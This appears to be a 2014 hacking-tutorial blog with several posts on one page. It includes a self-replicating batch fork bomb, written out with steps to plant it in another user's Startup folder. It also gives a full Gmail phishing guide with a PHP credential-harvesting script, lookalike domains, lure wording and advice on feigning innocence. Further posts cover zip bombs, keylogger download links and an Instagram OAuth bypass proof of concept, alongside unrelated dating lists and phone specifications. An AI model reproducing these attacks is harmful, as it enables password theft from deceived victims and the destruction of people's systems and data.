Thursday, 3 July 2014

Overloading Memory

Overloading Memory

Let the pain begin.
Batch file is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter.
A batch file may contain any command the interpreter accepts interactively at the command prompt. A batch file may also have constructs (IF, GOTO, Labels, CALL, etc.) that enable conditional branching and looping within the batch file.

Batch files usually have extensions : *.bat
They can be easily created in any word editor like notepad, wordpad.

In this tutorial you will learn how to create one of the simplest yet deadliest virus programs in the form of a batch file. This 6-line piece of code is so devastating, it can bring down a computer in a matter of seconds. (Well, at least it could a couple decades back)

Explanation: This batch file creates another batch file in the same directory, then copies itself into each of these newly created files. These files are then started up. Of course, they are identical so both of them start up again and repeat the process until the computer runs out of memory and crashes (or the antivirus catches it).

What this will do, if you leave it on long enough (about a couple minutes), is it will create so many copies of itself on the hard drive that all the empty space has been filled with these bats. Also it will use up all the computer's RAM as it is being told to run an ever-increasing number of the same processes, which over time gets too much for it to handle.
Depending on what runs out first hard disk space or RAM, the batch file may or may not cause permanent damage. In both cases, however, the computer will almost definitely crash, the operating system may be corrupted and on the next start up, you will be greeted by the well-known "Blue Screen Of Death". The only way to get rid of it will be to format your hard drive and re-install the operating system.

Further, we can have this beautiful file executed at startup, as a surprise for the unfortunate user who will happen to start the computer the next time.

NOTE: I cannot stress this enough- This is not a game. This tutorial is very dangerous (if you do it incorrectly) and for your own sake should never be actually performed. On execution, the computer will stop responding immediately and if the plug is not pulled off within 4-5 seconds (the program cannot be stopped after starting), there is a possibility of complete data loss and corruption of the hard drive.
With that out of the way, Here's how to do it :

Step 1 : Open a word editor like Notepad.

Step 2 : Type in the following code ->


@echo off
:A
SET /A x=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A

Step 3 :Save the File as "damage.bat" (or whatever) and we're done!

(Optional) Step 4 :To make this file execute automatically at startup, Do the following. Create a shortcut of the damage.bat file by right clicking on it. Open the start menu, In programs Open Startup folder and simply drag or cut-paste the shortcut into this folder. The virus will break loose the next time the computer is started up.

P.S. - If that sounded too easy to be true, it is. The thing is, this example is so basic it is known to 100% of all the antivirus softwares. Chances are if you do have even a really bad and outdated antivirus, it will most probably not even let you create this file or immediately delete it, as I experienced with my AVAST antivirus. But there are ways to get around this, which we'll look into later on.

Phishing


Phishing Fake it till you make
Fake it till you make it. What is Phishing ?
Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware etc. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.

This tutorial will explain you how to create fake login page for phishing, in this case we are going to go with Gmail as an example. This Procedure can be used to make fake pages for any other website in the same way. Yahoo!, Facebook, Myspace - Any website you want can be made using this tutorial.

Step 1:
Head over to the website gmail.com. Right Click anywhere and Save the Page as an HTML file.

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif", "mail_logo.png".

Step3:
Now we need to upload these images to any online image hosting website, for example - tinypic.com, postimage.com or photobucket.com. After uploading go to the image where you uploaded it and copy the URL of each image.

Step4:
Open the HTML file in any text editor like NotePad or MS Word.(You can use CTRL + F for the following)- Search for "google_transparent.gif" (without quotes) and replace it with corresponding URL. Search for "mail_logo.png" (without quotes) and replace it with corresponding URL.

Step 5:
In the same file, Search for :
action="https://www.google.com/accounts/ServiceLoginAuth"

And replace it with :
action="http://yoursite.urlhere/login.php"

(You have to write down your fake websites URL there, See Step 7 for creating it.)
Now save the file.

Step6:
Now you need to create a PHP file called "login.php". So open up a text editor (like NotePad) and type the following (You can copy it from this pastie):

<?php $handle = fopen("password.txt", "a");
fwrite($handle,$_POST["Email"]);
fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]);
fwrite($handle,"\n");
fwrite($handle,"\n");
fclose($handle) ;
header("Location:https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>

Now Save it as login.php

Step 7:
Open up notepad again and just save a new file as "pswrds.txt" without any contents.(Empty file)

Now upload those three files(namely :- index.html, login.php, pswrds.txt) in any of subdomain Web hosting site. (Note: that web hosting service must have php feature.)
You can use the following :
sites:110mb.com
spam.com
justfree.com
007sites.com
(or simply google it).

Follow the instructions in the Web hosting site and setup you fake login page. Make sure you name the URL something like g00gle.com or anything that you think would be the least suspicious.(Just make sure the URL doesn't stand out in the address bar as it may alert the victim.)

Step 8:
Create a fake email account, that is if you prefer to send the phishing webpage link anonymously.

Step 9:
And now all you have to do is send the victim something like: 'Gmail starts new feature : To use this service, log in to this page' ,along with this send the link to your fake website.

Note: For user to believe change your phishing web page url use any of free short url sites like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
Nevertheless, if you do get caught act like you had no clue: 'OMG ! I logged in to that website too , I'm going to change my pass now ! you do the same, quickly !'.

Protecting Yourself :
Phishing webpages are meant to fool the victim into thinking that the website they are logging into is genuine whereas it is actually a completely different website. The only sure-fire way to protect oneself from being the victim is to always make sure that the website you are giving your account and password to is bona fide by simply peeking at the address bar in your web browser. Also, avoid following any links from any dodgy websites, scam emails or even the comment sections in various places.
Everyone is guilty until proven innocent. Assume hostility or accept vulnerability.

*EDIT: This method currently does not work. At the time of writing, the files we upload to the hosting website were the same as mentioned here. As of now, however, these files are nowhere to be found. For some reason, the Gmail team seems to modify and change the log in page almost every other week causing the phishing method to be slightly different every time. Hence, kindly try out other hacking techniques for the time being. Since the phishing method is practically the same barring a few file names .You may also attempt the same method with other websites (Yahoo!, Facebook etc.) on your own.

Zip Bomb

Zip Bomb
Will blow your mind.
A zip bomb, also known as a decompression bomb (or the 'Zip of Death' for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program or system reading it. It is often employed to disable antivirus software, in order to create an opening for more traditional viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (e.g. by a virus scanner in order to scan for viruses) requires inordinate amounts of time, disk space or memory.

The classic zip bomb is a tiny zip file, most are measuered in kilobytes. However, when this file is unzipped its contents are more than what the system can handle (usually up to Petabyte, i.e 1000 Terabyte. Some go up to exabytes too). Yes, we're talking about stuffing exabytes of data into kilobytes. In my view, this ingenious little trick is the product of "pure hacker mentality". In essence, it's nothing like phishing or sessio hijacking or anything else that has put a bad name to "hackers". It's a simple creative solution, an exploited loophole which truly shows: "Where there's a will, there's a way". To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR etc.)

Various compression software and tools make use of what's called "Lossless compression algorithms". As the name suggests, these algorithms strive to compress files without any loss of information. Clearly, when we compress a file we'd definitely want to get it back in the same shape after decompressing. These algorithms usually exploit statistical redundancy in such a way as to represent the sender's data more concisely without error. In English now: We know that the computer only understands 0's and 1's, So every single program or any data stored in your computer is actually just a series of 1's and 0's (Binary form). Let's take an example that's not entirely correct but will help you understand the principle. Say, we've got a file which after being converted to binary launguage looks like "1110000101". Remember statistical redundancy that was mentioned earlier? Try to spot it in this string (1110000101). Statistical redundancy basically means that the same thing is repeated over and over again. In this string we see that there are three 1's followed by four 0's. Now take a look at this string: "3140101". What just happened here is compression. We can simply write a program that codes and decodes files as above (Softwares like WinZip use a fancy form and overly complicated form of what we did above). If the program finds repeating patterns, like a lot of 1's together, it may simply replace all those 1's by another number. Another example, we find "111111111" somewhere in a program. That's nine 1's in a row. What if we replace it by "91"? We can simply code our program to replace a "91" by writing "1" nine times, effectively reversing the process. Again, while decoding, if the program encounters any number other than 1 or 0, in our case 9, it can be instructed to write the successive number, in our case 1, 9 times. So "91" gets converted back to "111111111". That's lossless compression.

What about the previous string (3140101)? On uncompressing this, we get back 1110000101, that is, the original string. Like I said, this example is not entirely accurate. Note that the computer only understands binary. Everything that you'll ever do on a computer will have, at some point, been converted to binary form. Actually the computer is forced to convert to something other than binary (like english) only for us, dumb humans. We compressed "111111111" by writing "91". But the "9" in the "91" will also have to again be converted into 1's and 0's. So our program is quite buggy. Widely used programs like WinZip, WinRar, PowerISO etc. use various different algorithms for different cases.

Lossless compression is possible because most real-world data has statistical redundancy. Lossless compression schemes are reversible so that the original data can be reconstructed.
However, lossless data compression algorithms will always fail to compress some files. Indeed, any compression algorithm will necessarily fail to compress any data containing no discernible patterns. Attempts to compress data that has been compressed already may actually result in an expansion, as will attempts to compress all but the most trivially encrypted data. This is why if you've ever tried "ZIPing" or "RARing" a file, you would have noticed in some cases it works great while in other cases it may not even reduce the file size by 5%. (WinRAR and WinZIP can be considered the same for (almost) all practical purposes. Their names differ more than their compression abilities. Feel free to use either.)

Now, back to zip bombs. Before taking a deeper look, let's get the basic meaning cleared up. Take a new text file and write '0' a 1000 times. Save it, the file size should be just around 1 kilobyte. Open it up, CTRL+A, CTRL+C,CTRL+V - i.e, copy the whole thing then paste it. Do this ten times. Our file is now around 10kb, and completely made of 0's. Do this a few more times. Faster than your expectations, the file size will quickly climb into megabytes and then gigabytes. In most cases, the notepad (or any text editor) will actually begin to lag since it has a ridiculous amount of 0's open in the window. When that happens, that's your cue to slow down since different operating systems and softwares can have unexpected behavious when dealing with such large files. Practically, just keep it under a few gigabytes and you should be fine.
(Even this may be too much for some systems, I recommend pausing at about a 100 Mb and then slowly increasing the size. If the lag lasts longer than around 15 seconds, you've reached the limit.) So, we have a 5Gb text file (on an awesome computer) containing nothing but 0's. A little perspective: That's over five-freaking-billion zeros that the innocent little notepad obediently handled in a few seconds. So the next time you're getting annoyed at your browser lagging a little bit, try taking a notebook and write down 5Gb worth of text. It's only fair.

And we're back. What do we do now with that ridiculously large text file? Compress it and watch your seriously underappreciated computer do magic. In the same directory, you'll now see the pointlessly large text file, and alongside it, a zip file that should be under 1 Megabyte. That's like stuffing 5000 balls into the volume of one.

Now, for a deeper look let's check out the most famous zip bomb, the 42.zip file. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level - effectively converting their exponential growth to linear.

(Here's a small website dedicated solely to the 42.zip, http://www.unforgettable.dk/ . You can ven download a ready-made zip bomb from here. Password for the zip file is '42'. The file has a password to protect users who have ancient antivirus software that is set to automatically scan all downloads)

Now, to avoid giving the wrong impression a myth needs to be busted. "Zip Bomb" is not a very accurate name for this malicious file. If you extract a zip-bomb, it won't do anything to your computer though, it'll just create 16 smaller zip-bombs. If you decompress one of those it'll yield 16 more zip-bombs. As such, they're not going to "explode" when someone opens them, they're just used by malware authors to knock out anti-virus software so malware can work without needing to watch its back. What happens is, a malicious program may plant a zip bomb somewhere near it as bait for AV software. The program will wait until the anti-virus comes up for a routine scan, and it'll wait, "hiding" behind the zip-bomb. When the anti-virus reaches the bomb, it'll try to open it, all in its limited memory. 1 file becomes 16, which becomes 256, and it goes on until the memory is full. In reality though, the computer never runs out of memory because each process is only allowed to use so much memory, after it hits its limit it crashes itself to protect the rest of the computer from an OOM (Out-Of-Memory) event. When this happens to an anti-virus program as it's trying to dig into the file for malware, the software simply crashes and exits, while leaving the rest of the computer unharmed. The malware will detect this, and will then use that opportunity to do whatever it wants, without having to worry about AV software that might be right around the corner. Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these "bombs") to be smart and refuse to unpack archives that are "too large", because until the last level the total amount of data is not "that much", you don't "see" how large the files at the lowest level are until you have reached that level, by which time it is, of course, too late). However, most anti-virus software today recognizes a zip-bomb when it sees one, and will skip over it, alerting the user that the computer might be infected with malware. They usually go down to the second or third level before flagging the file.

Further, You wouldn't notice disk space being used because zip-bombs only decompress in an anti-virus program's memory, not to the disk. Most manual archive-opening programs don't even have a recursive opening mode for this very reason. Plus you also wouldn't notice much extra work by the CPU, because zip-bombs work so fast they can knock out an inadequately protected anti-virus program in seconds, while only using a fraction of the total computer's memory.

The 42.zip is just one example, there are many more like this and you can create your own. A similar file is an XML-based decompression bomb called "billion laughs" (or XML Bomb). Basically it crashes a web browser by causing the XML parser to run out of memory (Again, most browsers today will detect such recursive expansion and simply not try to parse the booby-trapped XML).

There's even a torrent for one of the largest (and smallest) zip bombs on the internet although it seems all the seeders have long gone. It's a 5.61 kilobyte zip file that expands to 4 Zettabytes. It seems to be at the absolute limit of zip bombs. Here's the KickAss Torrent link: http://kickass.to/zip-bomb-insanely-huge-zip-archive-4zb-t2105770.html (As a challenge, you can try replicating it. The file structure has been explained in the link: 8 layers, 32 archives in each layer, each archive containing a 4Gb file)

Let's walk through the process once again. Make a 4 Gb text file full of 0's. Zip it. Let's call it zip1. Create, say 10 copies of this zip file. We have 10 zip1's. Now, zip all ten zip1's again. Call it zip2. We're at the second level now and we can simply continue the process for as long as we like and the zip file will just keep getting bigger and bigger. A common doubt is, How can we create a zip file that opens up to a 4 Zettabyte size without having 4 Zettabyte memory on our computers? Actually, we don't even need 10 Gb for this. We just took a 4Gb text file and zipped it (into zip1). We can simply delete the original text file as it is no longer required. All we need is the first single tiny zip file and it is of this zip file that we create more copies, zip them up, create more copies and zip again and so on.

And that ends the story of the zip bomb. These actually come under the class of logic bombs, which also contains the fork bomb we made using batch files. Yet again, the name DDOS is going to pop up here. Zip bombs are basically DDOSers for antiviruses. Limited memory is a 'flaw' that has remained in all computers since their inception and hackers always find a way to exploit it. When the old methods stop working, new ones soon pop up and take their place. DDOSing, Zip Bombs, Fork Bombs, XML bombs, PDF bombs, buffer overflows and what not. This shows what a crucial part of programming 'memory management' really is. And so, we live another day, ready to combat the next problem.

Thursday, 22 May 2014

keyloggers

Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.


 About keyloggers

key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keylogger is commonly included in rootkits.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.

There are other approaches to capturing info about what you are doing.

    * Some keyloggers capture screens, rather than keystrokes.
    * Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection. 

A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:

    * Stealth: invisible in process list
    * Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    * ProBot program files and registry entries are hidden (Windows 2000 / XP)
    * Includes Remote Deployment wizard
    * Active window titles and process names logging
    * Keystroke / password logging
    * Regional keyboard support
    * Keylogging in NT console windows
    * Launched applications list
    * Text snapshots of active applications.
    * Visited Internet URL logger
    * Capture HTTP POST data (including logins/passwords)
    * File and Folder creation/removal logging
    * Mouse activities
    * Workstation user and timestamp recording
    * Log file archiving, separate log files for each user
    * Log file secure encryption
    * Password authentication
    * Invisible operation
    * Native GUI session log presentation
    * Easy log file reports with Instant Viewer 2 Web interface
    * HTML and Text log file export
    * Automatic E-mail log file delivery
    * Easy setup & uninstall wizards
    * Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP 
 Tools: 

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.
This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
  • Security - allows you to protect program settings, Hidden Mode and Log file.
  • Application monitoring - keylogger will record the application that was in use that received the keystroke!
  • Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
  • Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
  • Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
  • Ardamax Keylogger fully supports Unicodecharacters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
  • It records every keystroke. Captures passwords and all other invisible text.
Other Features:
  • Windows 2000/2003/XP/Vista/Windows 7 support
  • Monitors multi-user machines
  • Automatic startup
  • Friendly interface
  • Easy to install
 
Download Ardamax Keylogger (1.94Mb)

Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7 

The latest, improved and most stealth version of Perfect Keylogger is now available only after purchase. To protect the product from abuse and improve its quality for the registered users, we no longer offer the trial version of the latest builds. The localized versions of Perfect Keyloger and 64-bit version are also available after purchase. The last public version is still available
, but keep in mind that it's not the latest and may be flagged by security software.

Download Perfect keylogger

hack instagram account


Nir Goldshlager Founder of Break Security find the critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim's photos, edit comment and post new photos.

1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)


He reported a few issues to Instagram Include OAuth Attacks, But  the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar,  Then Facebook Security send me a message, They say even that they was unable to fix this issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,

So, first,  checked Instagram’s OAuth protocol:  (http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.

 



In addition, redirection was only allowed to go to the owner app domain.
Thus, hacker needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.


Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Game Over.

Bug 2.

With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.


Instagram Would like to access your public profile and friend list

Nir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

Chat with friends using command prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:


 
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
 



8) Now all you need to do is type your message and press Enter.
Start Chatting.......!


DONE....ENJOY.~!!

Sunday, 4 May 2014

Top 10 Reasons Why You Should Date a Geek Girl

10. She has traumatic memories from her K-12 education, or rather, the social interactions from her years before college. Your irrational fear of public bathrooms is not so irrational to her.
9. She’s smart, maybe even smarter than you. When she sees the string of acronyms after your name in your sig file, she gets excited. Conversely, she’ll taunt you when her string is longer.
8. She won’t look at you like you have two heads when you complain about bandwidth, when you scream at your computer, when you’ve taken apart your Xbox, when you start sewing a costume to wear at GenCon…
7. She understands your nutritional needs. She bakes cookies and orders pizza for D&D nights. When you’re playing WoW, she’ll cut your dinner into bite-sized pieces so you can eat and heal the main tank simultaneously.
6. If she doesn’t share your obsession with Star Wars, she at least understands it. The idea of a room wallpapered with figurines intrigues her and she’ll pick up a lightsaber to battle you to determine who takes out the garbage.
5. Geek girls come in all shapes and sizes from pixie to Willendorf goddess. Their hair is spikey, bobbed, down to their waist, or in braids. They are not slaves to fashion, but march to the beat of their own drummer, even if that drummer demands they wear shirts with jokes about counting in binary.
4. She’ll love you for your smarts, and if those smarts net you a lot of cash, that’s just the icing on the cake. (Everyone knows a really good cake doesn’t need icing!) Her intentions are to find a lifemate, not a lifeline. Besides, she’s smart enough to make her own fortune.
3. She loves to learn about anything and everything, so life and love are never vanilla. Nuff said?
2. Her friends are other geek girls, who you can set up with your geek friends. Not only will you be a hero, all those geeks would make a great WoW guild or D&D group!
1. If you’re a geek guy, she’ll trust you. If you’re a regular guy, she has eyes and ears everywhere and when she dumps you, you’ll know why. You won’t be sure of how she figured it out, but if I told you, she wouldn’t be able to do it again. ;-)

Ladies: 9 Reasons You Should Date a Nerd Like Me!!!

Ladies, is the reason you aren’t getting very far in the dating world because you haven’t let go of the girl you were in high school? We know it’s a stereotype, but sometimes women pine after the rebellious cool guy, the one that mothers hate and girlfriends envy. While we’re driving ourselves crazy to impress Mr. Cool, the undiscovered nerd is standing in the shadows waiting to be noticed.
You know who we’re talking about, right? We’re referring to that bespeckled guy that you overlooked so many years ago because he wasn’t cool. Well, brace yourself for revenge of the nerds, because this soft-spoken loner is smart, sincere and will genuinely be nice to you. If you haven’t given a second look to the guy that looks like your former Chemistry tutor, perhaps you should delve deeper into this untapped resource.
Maybe the comic book expert with the closetful of costumes for next month’s convention is a little much. But those guys who walk the line between nerd and die-hard geek could use just a little luring out of their shell. Underneath all of those odd hobbies and quirky friends, these men can not only hold a conversation, but they also champion a woman with an education, a large vocabulary and a mind of her own.
If you have never dated a nerd, consider the following 9 reasons why you might just need a geek in your life.
1. He’s Heartfelt
Although sometimes awkward, geeks are usually well-meaning and sincere. He wants to get to know you and feel comfortable with a real lady. Surely, it is quite a difference from the lonely nights with Lara Croft from Tomb Raider, but a welcome change nonetheless.
2. He’s a Smarty Pants
Nerds usually are intelligent, can hold a good job and are overall self-sufficient. He’s probably responsibly planned for and invested in his future well before any of us have started. Smart guys can also open your horizons and can offer a perspective or education about world news, politics or obscure movie trivia.
3. You’ll get the Star Treatment
Often overlooked, these guys can appreciate a woman when they get one. Likely to be a priority in his life, they show you off to their friends, call when they say they will and will most likely impress Mom and Dad. Okay, so maybe you will be number 2 or 3 after the computer games and geek trivia, but you won’t be on a long list of ladies vying for some time with him.
4. He’s Open to Suggestions
You can offer tips on fashions, hairstyles or even music of present day. They realize that they could use the help when replacing the acid washed jeans or “spiked” hair from the days of yore and welcome their newfound hipness.
5. He’s a Gentleman
A far cry from the smarmy creep at the bar, nerds are more likely to debate your favorite Superman villain than only go after that “one thing.” With little less relationship experience, his naïve fumbling with romantic advances come off as endearing and honest.
6. He’s a Go-Go Gadget Guy
Nerds tend to be more tech-savvy than the average layman, so whenever a frustrating situation happens with cache memory, deleting cookies or synchronizing the network, he can get those gadgets to behave.
7. He’ll Make You Laugh
With quirky interests and a matching sense of humor; nerds can share some interesting trivia or strange hobbies and while laughing at themselves, too. It’s a welcome deviation from the “I’m too cool to laugh at myself” act.
8. He Keeps the Right Company
Nerdy guys often have awkward geek friends. So instead of bad influences or disrespectful attitudes, your nerd man is hanging out with these guys playing Guitar Hero. A welcome reprieve from the raunchy “Guys Night Out,” when who knows what could happen, these guys are spending time with the fellas discussing politics or network gaming. Plus, the buddies treat you nice when you come around, while your new man will be the hit in the group with such a hot gal on his arm.
9. You Can Be Yourself
You don’t have to put on a show for these guys by wearing 4 inch heels and making yourself up to look like a goddess. We bet they wouldn’t mind your hair in a ponytail, the makeup-free glow, or your favorite jersey. You can be yourself around him and he won’t be the jerk that works so hard to make you feel ugly.
Like finding a diamond in the rough, your nerdy guy can be your own little treasure that no one has discovered yet. You will have to discover them, by the way. Nerdy ones are not the type to seek you out or make the first move, so you will have to be the brave one. But upon further examination, choosing a nerd may improve your chances of making a real connection.
Due to their neglected past, there are a bevy of nerdy gentlemen out there that never garnered a second look that are ready and willing to have a real relationship with someone that will give him a chance. So what if they are interested in geeky things? They make great companions because they stimulate the most vital organ: the brain.

samsung galaxy s5 full specification

Samsung SM-G900F for Europe
Samsung SM-G900I for Asia
Samsung SM-G900K/G900L/G900S for Korea
Samsung SM-G900M for Vodafone
Samsung SM-G900A for AT&T
Samsung SM-G900T for T-Mobile
GENERAL2G NetworkGSM 850 / 900 / 1800 / 1900 - all versions
3G NetworkHSDPA 850 / 900 / 1900 / 2100 - SM-G900F
HSDPA 850 / 900 / 1700 / 1900 / 2100 - SM-G900M
 HSDPA 850 / 1900 / 2100 - SM-G900A
HSDPA 850 / 1700 / 1900 / 2100 - SM-G900T
4G NetworkLTE 800 / 850 / 900 / 1800 / 1900 / 2100 / 2600 - SM-G900F
LTE 700 / 850 / 1700 / 1900 / 2100 / 2600 - SM-G900M
 LTE 700 / 850 / 1700 / 1800 / 1900 / 2100 / 2600 - SM-G900A
LTE 700/850/900/1700/1800/1900/2100/2600 - SM-G900T
SIMMicro-SIM
Announced2014, February
StatusAvailable. Released 2014, April
BODYDimensions142 x 72.5 x 8.1 mm (5.59 x 2.85 x 0.32 in)
Weight145 g (5.11 oz)
 - Fingerprint sensor (PayPal certified)
- IP67 certified - dust and water resistant
- Water resistant up to 1 meter and 30 minutes
DISPLAYTypeSuper AMOLED capacitive touchscreen, 16M colors
Size1080 x 1920 pixels, 5.1 inches (~432 ppi pixel density)
MultitouchYes
ProtectionCorning Gorilla Glass 3
 - TouchWiz UI
SOUNDAlert typesVibration; MP3, WAV ringtones
LoudspeakerYes
3.5mm jackYes
MEMORYCard slotmicroSD, up to 128 GB
Internal16/32 GB storage, 2 GB RAM
DATAGPRSYes
EDGEYes
SpeedHSDPA, 42.2 Mbps; HSUPA, 5.76 Mbps; LTE, Cat4, 50 Mbps UL, 150 Mbps DL
WLANWi-Fi 802.11 a/b/g/n/ac, dual-band, DLNA, Wi-Fi Direct, Wi-Fi hotspot
BluetoothYes, v4.0 with A2DP, EDR, LE
NFCYes
Infrared portYes
USBYes, microUSB v3.0 (MHL 2.1), USB On-the-go, USB Host
CAMERAPrimary16 MP, 5312 x 2988 pixels, phase detection autofocus, LED flash, check quality
Features1/2.6'' sensor size, 1.12 µm pixel size, Dual Shot, Simultaneous HD video and image recording, geo-tagging, touch focus, face and smile detection, image stabilization, HDR
VideoYes, 2160p@30fps, 1080p@60fps, 720p@120fps, HDR, video stabilization, dual-video rec., check quality
SecondaryYes, 2 MP, 1080p@30fps, dual video call
FEATURESOSAndroid OS, v4.4.2 (KitKat)
ChipsetQualcomm MSM8974AC Snapdragon 801
CPUQuad-core 2.5 GHz Krait 400
GPUAdreno 330
SensorsAccelerometer, gyro, proximity, compass, barometer, gesture, heart rate
MessagingSMS(threaded view), MMS, Email, Push Mail, IM, RSS
BrowserHTML5
RadioNo
GPSYes, with A-GPS support and GLONASS
JavaYes, via Java MIDP emulator
ColorsCharcoal Black, Copper Gold, Electric Blue, Shimmery White
 - Wireless charging (market dependent)
- ANT+ support
- S-Voice natural language commands and dictation
- Smart stay, Smart pause, Smart scroll
- Air gestures
- Dropbox (50 GB cloud storage)
- Active noise cancellation with dedicated mic
- TV-out (via MHL 2.1 A/V link)
- SNS integration
- MP4/DivX/XviD/WMV/H.264/H.263 player
- MP3/WAV/WMA/eAAC+/FLAC player
- Organizer
- Image/video editor
- Document viewer (Word, Excel, PowerPoint, PDF)
- Google Search, Maps, Gmail,
YouTube, Calendar, Google Talk, Picasa
- Voice memo/dial/commands
- Predictive text input (Swype)
BATTERY Li-Ion 2800 mAh battery
Stand-byUp to 390 h
Talk timeUp to 21 h
Music playUp to 67 h
MISCSAR US1.20 W/kg (head)     1.58 W/kg (body)    
SAR EU0.56 W/kg (head)     0.41 W/kg (body)    
Price group
TESTSDisplayContrast ratio: Infinite (nominal), 3.549 (sunlight)
LoudspeakerVoice 66dB / Noise 66dB / Ring 75dB
Audio qualityNoise -96.3dB / Crosstalk -95.2dB
CameraPhoto / Video
Battery life
Disclaimer. I can not guarantee that the information on this page is 100% correct.

Translate

Contact Form

Name

Email *

Message *